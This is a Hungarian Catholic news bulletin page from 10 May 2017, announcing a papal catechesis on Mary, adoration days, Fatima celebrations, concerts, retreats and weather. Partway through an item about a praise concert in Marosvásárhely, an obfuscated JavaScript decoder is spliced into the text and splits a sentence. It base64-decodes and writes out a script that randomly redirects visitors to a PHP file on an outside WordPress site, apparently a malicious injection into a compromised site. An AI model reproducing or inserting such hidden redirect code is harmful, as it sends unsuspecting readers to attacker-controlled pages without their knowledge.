2017. május 10. – Hírek és programajánló

H Í R E K   E S T E

Mária, a reménység anyja
A vatikáni Szent Péter téren zajlott ma délelőtt a szokásos szerda délelőtti általános kihallgatás, melyen Ferenc pápa folyatta a keresztény reménységről szóló katekézis-sorozatát. A mai napon a Boldogságos Szűz Máriát, mint a reménység anyját állította a figyelem központjába a szentatya. Tanításában a pápa kiemelt két nagyon fontos pillanatot, amikor Máriával találkozunk az evangéliumokban: elsőként az angyali üdvözletkor, amikor bátran mond igen-t Isten tervére, majd a kereszt lábánál álló édesanyára hívja fel figyelmünket. Életének legsűrűbb sötétségét éli meg a Szűzanya a kereszt lábánál, mondja a szentatya, mégis nem adja meg magát, ott áll, ott van hűségesen. Nem tudja mi következik, de ott áll, mert hűséges ahoz az Istenhez, akinek szolgálóleánya lett. Ő a mi édesanyánk is, nem vagyunk árvák, és Ő megtanítja nekünk a várakozás erényét, akkor is, amikor minden logikátlan. A nehézség pillanataiban a Szűzanya őrködjön lépteink fölött, és súgja a mi szívünkbe „állj fel, nézz előre!”, hiszen ő a reménységnek az anyja – fejezte be katekézisét Ferenc pápa.

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a holnapi nap folyamán Csíkszépvízen, a latin templomban tartják az örökös szentségimádási napot. Örömmel járuljunk a kenyér színe alatt rejtőző feltámadt Krisztus elé, megköszönve a megváltás ajándékát, dicsőítve és imádva Őt a legméltóságosabb Oltáriszentségben.

Fatimai Szent Szűz ünnepe
A Boldogságos Szűz Mária fatimai jelenésének emlékére május 12-én, pénteken délután hat órakor szentségimádást, nyolc órától szentmisét tartanak a nagyváradi római katolikus székesegyházban, majd kilenc órakor az év első gyertyás körmenetét tartják a Püspöki Palota kertjében. A szentmise főcelebránsa és szónoka Pék Sándor nagyvárad-újvárosi plébános.
A nagyenyedi Árpád-házi Szent Erzsébet templomban is már több éve, májustól októberig, minden hónap 13-án megünnepelik a Fatimai Boldogságos Szűz Mária napját. Idén is, különös tekintettel a jelenések 100. évfordulójára, május 13-án megkezdik a Fatimai Szűzanya tiszteletére bemutatott szentmisék sorát. A program a következőképpen alakul: délután négy órától hat óráig engesztelő szentségimádás, hat órától ünnepi szentmise, majd gyertyás körmenet.

Előadás Székelyudvarhelyen
Dr. Csókay András idegsebész főorvos, világhírű agykutató tart előadást Székelyudvarhelyen június 1-jén, a Szent Pio Lelkigyakorlatos Házban, Az este hét órától kezdődő előadás keretében a főorvos beszél arról, hogy hogyan talált rá Istenre, a hit erejéről, Istenbe vetett reményéről, hétköznapi csodákról. Minden érdeklődőt várnak.

Időjárás: Holnap is változóan, erősen felhős idő lesz a jellemző, a délutáni óráktól északkeleten és az erdélyi medence térségében futó záporok is kialakulhatnak. Megélénkül, megerősödik a délnyugati szél. A hajnal még hűvős, de napközben 10-18 fok között alakul a hőmérséklet.

MRE – Hírszolgálat, 2017. május 10.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Gyímesfelsőlokon tartják az örökös szentségimádási napot. Örömmel járuljunk a kenyér színe alatt rejtőző feltámadt Krisztus elé, megköszönve a megváltás ajándékát, dicsőítve és imádva Őt a legméltóságosabb Oltáriszentségben.

Könyvbemutató Csíkszeredában
A csíkszeredai Kájoni János Megyei Könyvtár előadótermében ma délután  öt órától bemutatják a Testben élünk című könyvet, a Keresztény Szó Könyvek sorozat 6. kötetét Bodó Márta szerkesztő és Szőcs Csaba, a Verbum Kiadó igazgatója részvételével. Közreműködik Sárközi Sándor piarista szerzetestanár.

Imaest Csíkszeredában
Május 11-én, csütörtökön, Salkaházi Boldog Sára vértanú emléknapján Csíkszeredában a Millenniumi templomban az esti hét órás szentmise után a szociális testvérek és kültagjaik imaórát vezetnek. Szentségimádás, tanúságtétel és közbenjáró ima keretében adnak hálát vértanú elődjükért, és kérik hathatós közbenjárását. Hívják és várják a közös imára mindazokat, akik boldog Sára testvér közbenjárását akarják kérni különböző szándékukra.

Barokkzene-koncert májusban
Kolozsvár új, debütáló barokkzenekarával, a Transylvania Galante-val a La Stravaganza Régizene Fesztivál 5. rendezvényén sorra kerülő koncerten ismerkedhet meg a közönség. A zenekar tagjai többnyire a La Stravaganza Barokk Kamarazeneverseny győztesei közé sorolhatóak. A művészek elsődleges célja, hogy meghonosítsák a histórikus előadásmódot és a korhű hangszereken való játékot. A koncerten megismerkedhetnek például a klarinét egyik korábbi rokonával, a chalumeuval. A műsor Gheorghe Philip Telemann, késő-barokk zeneszerző tavaszi hangulatú darabjaiból áll össze, emlékezve ezáltal a zeneszerzőre halálának 250. évfordulóján. A hangversenyre május 11-én, délután hat órától kerül sor a Piarista templomban. A belépés díjtalan. Várnak minden zenekedvelőt!

Egyházmegyei Ifjúsági találkozó Temesváron
Május 12–14. között tartják az Egyházmegyei Ifjúsági Találkozót Temesváron. Az idei találkozó mottója: „Menjetek el az egész világra, és hirdessétek az evangéliumot minden teremtménynek.” (Mk 16,15) Az eseményről bővebben a temesvári egyházmegye facebook oldalán olvashatnak.

Dicsőítő koncert Marosvásárhelyen
Második alkalommal rendez dicsőítő koncertet az udvarfalvi  Reménység zenekar. Az eseménynek május 13-án délután  öt órától a marosvásárhelyi Mihai Eminescu ifjúsági ház ad otthont. Meghívott vendégek az ismert Hanna Projekt Magyarországról és a Csit Bfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');and Csíkszeredából. A rendezvény célja egybegyűjteni a város és a környező települések fiataljait (és nemcsak), elősegítve a hitbeli növekedésüket. A koncert mottója „Eldőlt a szívemben", és azokat szólítja meg akik valóban keresik az élet igazi értékét és értelmét.

Imadélután Temesváron
A temesvár-józsefvárosi Notre Dame zárdatemplomban május 14-én, vasárnap Dona Nobis Pacem! címmel a békéért tartanak imadélutánt. A program délután öt órakor rózsafüzér-imával kezdődik, ezt követően hat órakor szentmisét mutatnak be, majd hét órától szentségimádással zárul. Az imadélután zenei szolgálatát Dumitrescu Melinda végzi.

Gyászfeldolgozó lelkigyakorlat Kézdivásárhelyen
A kézdivásárhelyi Boldog Özséb plébánián május 22. és július 24. között, heti egy alkalomból álló gyászfeldolgozó lelkigyakorlatot tart Hajlák Attila-István segédlelkész. Az első találkozás május 22-én, hétfőn este hét órakor lesz. Érdeklődni és jelentkezni a 0742 698166-os telefonszámon lehet.

Kísért imádság hete Kolozsváron
A szociális testvérek május 25. és 31. között hívják és várják a Kísért imádság hetére mindazokat, akik szeretnének megtanulni imádkozni a Szentírással, vagy már tudnak, de mélyebb Isten-kapcsolatra vágynak, akik szeretnének Isten szemével tekinteni életükre és önmagukra, akik szívesen elmennének egy lelkigyakorlatra, de most éppen nincs rá módjuk. A programra Kolozsváron kerül sor. Az együtt ünnepelt kezdő és záró szentmise között a hét folyamán a résztvevőknek naponta egy órát kell szentelniük imádságra, illetve minden nap megoszthatják tapasztalataikat személyes kísérőjükkel. A program iránt érdeklődők számára a testvérek részletes ismertető levelet és jelentkezési lapot küldenek. Jelentkezni május 18-ig lehet Farmati Anna testvérnél a 0740 430666-os telefonszámon, vagy a szocialis.testverek@gmail.com címen.
Kísérők: Farmati Anna SSS, Fülöp Magdolna SSS, Homa Ildikó SSS, Imre Edit SSS testvérek.

Management by Jesus szeminárium Kolozsváron
Kiss Ulrich jezsuita szemináriumot tart vezetők részére Kolozsváron, a Manréza Központban május 25–28. között. A műhelymunka Szent Márk evangéliumára épít. A helyek száma korlátozott: 12 fő. A jelentkezéseket beérkezésük sorrendjében fogadják el május 18-áig. A Managament by Jesus szemináriumról bővebben a Manreza Központ Facebook oldalán olvashatnak.

Időjárás: Ma változóan, erősen felhős időben lesz részünk, de azért hosszabb-rövidebb napos időszakokra mindenhol számíthatunk, csapadék nem várható. Nyugaton és északon élénk lehet a szél. Hideg hajnalra ébredtünk, napközben pedig 9-16 fokot mérhetünk. 

MRE - Hírszolgálat, 2017. május 10.

About the author

maradmin

Leave a Comment